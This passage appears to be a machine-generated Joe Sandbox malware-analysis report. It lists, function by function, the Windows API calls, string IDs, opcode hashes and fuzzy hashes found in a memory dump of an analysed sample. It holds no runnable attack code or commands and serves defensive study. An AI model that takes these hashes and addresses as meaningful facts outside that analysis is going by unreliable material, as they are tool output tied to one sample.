                                                                                                                                                                                                                                      • String ID: @
                                                                                                                                                                                                                                      • API String ID: 4150878124-2766056989
                                                                                                                                                                                                                                      • Opcode ID: 957d3aa5c1ee6917ee485b31cb1e6f427d7cd1ca7a90661b997a27d0eb180b95
                                                                                                                                                                                                                                      • Instruction ID: 560b95a29844db2a691ebf3179c3695d228581ff3c44d211be14b268cf5cc7f7
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 957d3aa5c1ee6917ee485b31cb1e6f427d7cd1ca7a90661b997a27d0eb180b95
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 03414E7290021CAFDB11DBA4CD82FDEBBB8EB45740F105099FA95B7181DB716E85CBA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00ECC9BC
                                                                                                                                                                                                                                      • DeleteMenu.USER32(?,00000007,00000000), ref: 00ECCA02
                                                                                                                                                                                                                                      • DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00F32990,0170BAE0), ref: 00ECCA4B
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$Delete$InfoItem
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 135850232-4108050209
                                                                                                                                                                                                                                      • Opcode ID: b894f033e6da515e4e545af417f63b9e5dc8a4e036fec4feec1fbbf037c6b817
                                                                                                                                                                                                                                      • Instruction ID: ef0fc9c46e06fd2b0d615fd877c59b1ba811181282062c114f6a2b70ae2f8b96
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b894f033e6da515e4e545af417f63b9e5dc8a4e036fec4feec1fbbf037c6b817
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DA419F302043459FD724DF24C948F6ABBE4BB85318F24561DF9AAA7291E731E846CB62
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00ECE502: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00ECD5D8,?), ref: 00ECE51F
                                                                                                                                                                                                                                        • Part of subcall function 00ECE502: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00ECD5D8,?), ref: 00ECE538
                                                                                                                                                                                                                                      • lstrcmpiW.KERNEL32(?,?), ref: 00ECD5FB
                                                                                                                                                                                                                                      • MoveFileW.KERNEL32(?,?), ref: 00ECD635
                                                                                                                                                                                                                                      • SHFileOperationW.SHELL32(?), ref: 00ECD717
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: FileFullNamePath$MoveOperationlstrcmpi
                                                                                                                                                                                                                                      • String ID: \*.*
                                                                                                                                                                                                                                      • API String ID: 67141772-1173974218
                                                                                                                                                                                                                                      • Opcode ID: dbaefdaeca9ce44e90e59f9a9e00c27d0e246acf4479fb74c184cea1c024718d
                                                                                                                                                                                                                                      • Instruction ID: 7737d747025f701eb5ec9a5b83529955c2dc56941c9f69feba3ea184b8f8d1cd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbaefdaeca9ce44e90e59f9a9e00c27d0e246acf4479fb74c184cea1c024718d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3E4166B19492189EDF12EBA4DE81FDD77F8AF04344F0010EEE509F7151EA36A689CB50
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00EFDCD0,00000000,?,?,?,?), ref: 00EF4D11
                                                                                                                                                                                                                                      • GetWindowLongW.USER32 ref: 00EF4D2E
                                                                                                                                                                                                                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 00EF4D3E
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Window$Long
                                                                                                                                                                                                                                      • String ID: SysTreeView32
                                                                                                                                                                                                                                      • API String ID: 847901565-1698111956
                                                                                                                                                                                                                                      • Opcode ID: 594a95de6005d23666f88c0365eb00fd50fa366f6b5da7d854b58f5a5bc24816
                                                                                                                                                                                                                                      • Instruction ID: a741d60ab242ebc7424446a27a1cb204ad993ac59652b52b01b45e54e66d0cff
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 594a95de6005d23666f88c0365eb00fd50fa366f6b5da7d854b58f5a5bc24816
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B531AF71200209AFEF118E38CC45BEB7BA9EB44378F255715FA79B22E0D771AC509750
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00001009,00000000,?), ref: 00EF47A5
                                                                                                                                                                                                                                      • SetWindowPos.USER32(?,00000000,?,?,?,?,00000004), ref: 00EF47B9
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00001002,00000000,?), ref: 00EF47DD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$Window
                                                                                                                                                                                                                                      • String ID: SysMonthCal32
                                                                                                                                                                                                                                      • API String ID: 2326795674-1439706946
                                                                                                                                                                                                                                      • Opcode ID: bad2cfdfd1e7b63023a72cb57da5a2a2081137cb91ee10796b48aecd79e76e8c
                                                                                                                                                                                                                                      • Instruction ID: 9c7f0cf7df29b1e8bfddae10435705ca7a08bc90dc6114d58ce165cccbf1e266
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: bad2cfdfd1e7b63023a72cb57da5a2a2081137cb91ee10796b48aecd79e76e8c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE21BF72500219ABDF119FA0CC42FEB3BA9EF89728F111215FA15BB1D0D6B1A8558B90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00EF4F6C
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00EF4F7A
                                                                                                                                                                                                                                      • DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00EF4F81
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$DestroyWindow
                                                                                                                                                                                                                                      • String ID: msctls_updown32
                                                                                                                                                                                                                                      • API String ID: 4014797782-2298589950
                                                                                                                                                                                                                                      • Opcode ID: c33b20df83991beff270e7214828b6945ad15f152dc6e6f3d72a16798e4620c5
                                                                                                                                                                                                                                      • Instruction ID: 4c21ba898fd79dfc40f0f643517de42437aa534d6707d515ea83df18379f8b99
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c33b20df83991beff270e7214828b6945ad15f152dc6e6f3d72a16798e4620c5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DC2160B5601209AFEB01DF14DC81DBB37EDEF4A3A8B051159FA04AB291CB70ED11DAA0
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00EF40A5
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00EF40B5
                                                                                                                                                                                                                                      • MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00EF40DB
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend$MoveWindow
                                                                                                                                                                                                                                      • String ID: Listbox
                                                                                                                                                                                                                                      • API String ID: 3315199576-2633736733
                                                                                                                                                                                                                                      • Opcode ID: b005a267eda95ba3d4bd74b039dbe23bd34d589669440bff8a3f9fc6237e2453
                                                                                                                                                                                                                                      • Instruction ID: c53afd0049583b06a63dc5ecc6bf70c175a4db5dd69a41499d2708d99513b80c
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: b005a267eda95ba3d4bd74b039dbe23bd34d589669440bff8a3f9fc6237e2453
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0A21B07260011CBBEF128F54DC45FBB3BAEEB89754F009115FB14AB1D0CA719C5197A1
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000001), ref: 00ED5258
                                                                                                                                                                                                                                      • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00ED52AC
                                                                                                                                                                                                                                      • SetErrorMode.KERNEL32(00000000,?,?,00EFDCD0), ref: 00ED5320
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ErrorMode$InformationVolume
                                                                                                                                                                                                                                      • String ID: %lu
                                                                                                                                                                                                                                      • API String ID: 2507767853-685833217
                                                                                                                                                                                                                                      • Opcode ID: 21c91dce1247d5c930890e0e1991e9dd94ad8adb6c691673a221dd0e9ee0b067
                                                                                                                                                                                                                                      • Instruction ID: 291d4f5a8a0f320934abf87f464272e2193cc70894ee11a70dea27c74e48e0c0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 21c91dce1247d5c930890e0e1991e9dd94ad8adb6c691673a221dd0e9ee0b067
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B4317371A00108AFDB10DF64C885EAA7BF9EF49358F144099F909EB362D771ED46CB61
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00EF4AB6
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00EF4ACB
                                                                                                                                                                                                                                      • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00EF4AD8
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: MessageSend
                                                                                                                                                                                                                                      • String ID: msctls_trackbar32
                                                                                                                                                                                                                                      • API String ID: 3850602802-1010561917
                                                                                                                                                                                                                                      • Opcode ID: cf3b570884cc1ed6c66e8f688c0e78e7befbf5dee74b08045b574e2ebd865de2
                                                                                                                                                                                                                                      • Instruction ID: 25bc93d08c3dcbab12a98b8200a1926d03976b77f46864fbfd860bb9e98ca1aa
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cf3b570884cc1ed6c66e8f688c0e78e7befbf5dee74b08045b574e2ebd865de2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B211C17228020CBEEF115F65CC06FBB3BA8EB85B68F114515FA65E60D0E671D8119B14
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                        • Part of subcall function 00EC3433: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00EC3451
                                                                                                                                                                                                                                        • Part of subcall function 00EC3433: GetWindowThreadProcessId.USER32(?,00000000), ref: 00EC3462
                                                                                                                                                                                                                                        • Part of subcall function 00EC3433: GetCurrentThreadId.KERNEL32 ref: 00EC3469
                                                                                                                                                                                                                                        • Part of subcall function 00EC3433: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00EC3470
                                                                                                                                                                                                                                      • GetFocus.USER32 ref: 00EC3603
                                                                                                                                                                                                                                        • Part of subcall function 00EC347A: GetParent.USER32(00000000), ref: 00EC3485
                                                                                                                                                                                                                                      • GetClassNameW.USER32(?,?,00000100), ref: 00EC364E
                                                                                                                                                                                                                                      • EnumChildWindows.USER32(?,00EC36C6), ref: 00EC3676
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows
                                                                                                                                                                                                                                      • String ID: %s%d
                                                                                                                                                                                                                                      • API String ID: 2776554818-1110647743
                                                                                                                                                                                                                                      • Opcode ID: d93230e4e9a6426b7fc4466acaf3c076f3639eef29474b67187507a773c7767c
                                                                                                                                                                                                                                      • Instruction ID: 3d4b0a0487483a31ce0c1c03f6e73934364c0b20057a62c4ae8fb0cc657f196f
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d93230e4e9a6426b7fc4466acaf3c076f3639eef29474b67187507a773c7767c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D01108712002056BCF05BF709D85FED77AAAF94308F009069BD19B7282CE71990ADB60
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00EF6128
                                                                                                                                                                                                                                      • SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00EF6155
                                                                                                                                                                                                                                      • DrawMenuBar.USER32(?), ref: 00EF6164
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Menu$InfoItem$Draw
                                                                                                                                                                                                                                      • String ID: 0
                                                                                                                                                                                                                                      • API String ID: 3227129158-4108050209
                                                                                                                                                                                                                                      • Opcode ID: 3dc5b2ad284005f4d25d3e2d202fa16b059a8fb5dc2d8e45015eb6552e0e66e3
                                                                                                                                                                                                                                      • Instruction ID: 050575f849b162569ecb0e0da585ff5c396aeee8c7f2fea4f96e3eaa863c806b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3dc5b2ad284005f4d25d3e2d202fa16b059a8fb5dc2d8e45015eb6552e0e66e3
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D0016932504218EFDB609F11DC44BBABFB5FB45354F148099EA4DFA151DB708988EF21
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(?,GetSystemWow64DirectoryW), ref: 00EBE48B
                                                                                                                                                                                                                                      • FreeLibrary.KERNEL32 ref: 00EBE4B1
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                                                                                                                                                      • String ID: GetSystemWow64DirectoryW$X64
                                                                                                                                                                                                                                      • API String ID: 3013587201-2590602151
                                                                                                                                                                                                                                      • Opcode ID: 90b9e987363e9adbadcc5dc51b5b3677b596ac398f2b67cbf3224a0cc90530e0
                                                                                                                                                                                                                                      • Instruction ID: f1c588e176423b724635faac202f7640ebcd7758aaaf9d74ba25209453c75bac
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 90b9e987363e9adbadcc5dc51b5b3677b596ac398f2b67cbf3224a0cc90530e0
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BCE0227190B6229FD37226204C48AFB3BA56F00754B186559EA06F7340EB28CC89D291
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699300864.0000000000EFD000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699599683.0000000000F23000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699718477.0000000000F2D000.00000004.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42699819446.0000000000F35000.00000002.00000001.01000000.00000000.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_13_2_e60000_Fuck.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6d549277bf576f5119797e786febf70c598784398d383a4c669895830c6077c5
                                                                                                                                                                                                                                      • Instruction ID: 0a3f19fa0f8f7c33cb0a10e9fa51d0a6c1b1bf0272ad20188ef8ba4f7a4d3cbd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6d549277bf576f5119797e786febf70c598784398d383a4c669895830c6077c5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44C15B75A00206EFDB08CF98C984FAAB7B5FF88714F109599E505EB251D732ED82CB90
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 0000000D.00000002.42697935871.0000000000E61000.00000020.00000001.01000000.00000000.sdmp, Offset: 00E60000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 0000000D.00000002.42697871017.0000000000E60000.00000002.00000001.01000000.00000000.sdmpDownload File
